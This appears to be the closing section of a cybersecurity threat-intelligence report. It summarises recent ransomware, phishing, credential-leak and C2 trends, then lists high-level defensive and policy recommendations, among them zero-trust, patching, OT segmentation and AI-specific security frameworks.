Tactical Implications: Threat actors increasingly exploit low-security barriers, including weak authentication (LastPass, Gladinet), unpatched vulnerabilities (Clop, React2Shell), and social engineering (AI-generated resumes, HR-themed phishing). Ransomware groups and APTs leverage advanced tooling (Rust-based 01flip, Shanya packer) and hybrid tactics (hacktivism/RaaS). Defenders must enforce MFA, segment OT/IT networks, monitor for credential leaks (Docker Hub), and adopt AI-resistant verification to counter deepfakes and synthetic fraud. Proactive threat hunting is essential against evolving C2 frameworks (Brickworm, GhostFrame).
Forward-Looking Recommendations
- Enhance international collaboration to dismantle cross-border cybercrime networks, focusing on cryptocurrency laundering and infrastructure takedowns.
- Strengthen supply chain security through rigorous vendor assessments and real-time monitoring to mitigate third-party risks.
- Prioritize AI-driven threat detection to counter deepfake scams, ransomware, and evolving malware like Rust-based 01flip.
- Mandate stricter identity verification and transparency for digital platforms to combat impersonation and synthetic fraud.
- Enforce zero-trust architectures and secrets management to prevent credential leaks from exposed databases and cloud services.
- Invest in securing operational technology (OT) systems and critical infrastructure with segmentation and proactive vulnerability patching.
- Adopt legislative measures to regulate algorithmic stablecoins and hold crypto platforms accountable for fraud prevention.
- Expand cybersecurity training for employees to counter phishing, social engineering, and AI-augmented attacks.
- Accelerate patch management and threat intelligence sharing to address zero-day exploits and unpatched vulnerabilities.
- Develop AI-specific security frameworks to mitigate risks from retrieval-augmented generation (RAG) and adversarial data poisoning.
